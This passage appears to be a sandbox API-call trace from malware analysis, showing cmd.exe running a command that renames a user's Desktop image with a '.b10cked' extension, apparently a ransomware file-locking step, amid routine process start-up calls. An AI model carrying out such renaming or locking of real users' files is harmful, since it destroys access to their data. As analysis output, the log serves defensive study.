start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34664 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34739 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 34740 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34741 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34742 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34743 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34744 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34745 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 34746 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 34747 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 34748 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001190000" filename = "" Thread: id = 854 os_tid = 0xeb0 [0231.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26faec | out: lpSystemTimeAsFileTime=0x26faec*(dwLowDateTime=0xbdc8dfc0, dwHighDateTime=0x1d440a9)) [0231.906] GetCurrentProcessId () returned 0x9c4 [0231.906] GetCurrentThreadId () returned 0xeb0 [0231.906] GetTickCount () returned 0x3fd03 [0231.907] QueryPerformanceCounter (in: lpPerformanceCount=0x26fae4 | out: lpPerformanceCount=0x26fae4*=28869575661) returned 1 [0231.907] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.907] __set_app_type (_Type=0x1) [0231.907] __p__fmode () returned 0x76b331f4 [0231.907] __p__commode () returned 0x76b331fc [0231.908] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.908] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.908] GetCurrentThreadId () returned 0xeb0 [0231.908] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb0) returned 0x38 [0231.908] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.908] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa7c | out: phkResult=0x26fa7c*=0x0) returned 0x2 [0231.922] VirtualQuery (in: lpAddress=0x26fab3, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: 
lpAddress=0x170000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.964] GetEnvironmentStringsW () returned 0x2c0178* [0231.965] FreeEnvironmentStringsW 
(penv=0x2c0178) returned 1 [0231.965] GetEnvironmentStringsW () returned 0x2c0178* [0231.965] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0231.965] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9ec | out: phkResult=0x26e9ec*=0x40) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0xa0, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x0, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x40, 
lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegCloseKey (hKey=0x40) returned 0x0 [0231.966] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9ec | out: phkResult=0x26e9ec*=0x40) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x0, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegCloseKey (hKey=0x40) 
returned 0x0 [0231.966] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.966] srand (_Seed=0x5b8863bf) [0231.966] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" [0231.966] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" [0231.966] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.967] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.967] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.967] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.967] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.967] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.967] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.967] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.967] 
SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.968] GetEnvironmentStringsW () returned 0x2c22c8* [0231.968] FreeEnvironmentStringsW (penv=0x2c22c8) returned 1 [0231.968] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.968] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.968] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.968] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.968] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.968] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.968] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.968] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.968] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f7b8, lpFilePart=0x26f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f7b4*="Desktop") returned 0x18 [0231.968] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.968] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.970] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.970] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.970] GetEnvironmentStringsW () returned 0x2c2ae8* [0231.970] FreeEnvironmentStringsW (penv=0x2c2ae8) returned 1 [0231.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.971] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="0") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="0") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="1") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.994] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.995] GetConsoleTitleW (in: lpConsoleTitle=0x2b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.038] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.038] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.038] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.038] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.038] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.038] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.038] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.041] GetConsoleTitleW (in: lpConsoleTitle=0x26f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.118] _wcsicmp (_String1="move", _String2="DIR") 
returned 9 [0232.118] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.118] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.118] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.118] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.118] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.118] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.118] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.118] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.118] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.118] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.119] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.119] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.119] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.119] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.119] _wcsicmp (_String1="move", 
_String2="TITLE") returned -7 [0232.119] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.119] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.119] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.121] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 
[0232.131] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.132] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2=".") returned 72 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2="..") returned 72 [0232.133] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_a~1.bmp")) returned 0x20 [0232.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.133] SetErrorMode (uMode=0x0) returned 0x0 [0232.133] SetErrorMode (uMode=0x1) returned 0x0 [0232.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", nBufferLength=0x104, lpBuffer=0x26ed34, lpFilePart=0x26ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", lpFilePart=0x26ed1c*="VX2E_A~1.BMP") returned 0x25 [0232.133] SetErrorMode (uMode=0x0) returned 0x1 [0232.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2=".") returned 72 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2="..") returned 72 [0232.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_a~1.bmp")) returned 0x20 [0232.133] SetErrorMode (uMode=0x0) returned 0x0 [0232.133] SetErrorMode (uMode=0x1) returned 0x0 [0232.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", nBufferLength=0x104, lpBuffer=0x26f1b0, lpFilePart=0x26ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", lpFilePart=0x26ef48*="VX2E_A~1.BMP") returned 0x25 [0232.134] SetErrorMode (uMode=0x0) returned 0x1 [0232.134] SetErrorMode (uMode=0x0) returned 0x0 [0232.134] SetErrorMode (uMode=0x1) returned 0x0 [0232.134] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26f3b8, 